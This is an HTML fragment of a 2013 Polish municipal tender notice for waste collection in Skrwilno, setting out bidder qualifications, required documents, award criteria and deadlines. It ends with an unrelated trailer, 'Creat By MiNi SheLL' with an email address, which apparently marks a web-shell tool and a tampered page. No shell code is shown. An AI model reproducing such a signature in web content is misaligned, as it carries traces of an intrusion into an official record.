<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku dotyczącego posiadania wiedzy i doświadczenia, którego opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu Zamawiający żąda: 
potwierdzenia wykonania w okresie ostatnich 3 lat, co najmniej 1 usługi odbioru odpadów komunalnych wykonanej na rzecz właścicieli nieruchomości w sposób ciągły przez okres minimum 12 miesięcy o masie łącznej minimum - 500 Mg.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku dotyczącego potencjału technicznego, którego opis sposobu spełnienia został dokonany w ogłoszeniu o zamówieniu, Zamawiający żąda dysponowania specjalistycznym sprzętem zgodnie z Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 roku w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości Dz.U. 2013 r. poz.122 w tym:
- pojazd typu hakowiec przystosowany do odbioru kontenerów z odpadami typu KP5, KP7.
- pojazd z żurawiem HDS przystosowany do odbioru odpadów z selektywnej zbiórki z pojemników typu dzwon.
- śmieciarka małogabarytowa przystosowana do odbioru odpadów z posesji o utrudnionym dojeździe wyposażona w mechanizm załadowczy do załadunku pojemników o pojemności 110 - 1100 litrów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony po przedłożeniu oświadczenia, że spełnia warunki art.22 ust.1 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony po przedłożeniu oświadczenia, że spełnia warunki art.22 ust.1 ustawy PZP.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>w przypadku dopuszczenia udzielenia zamówień uzupełniających stanowiących nie więcej niż 20% wartości zamowienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.skrwilno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Skrwilnie, ul. Rypińska 7, 87-510 Skrwilno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.11.2013 godzina 12:00, miejsce: Gmina Skrwilno, ul.Rypińska 7, 87-510 SKRWILNO.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 24.12.2013.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com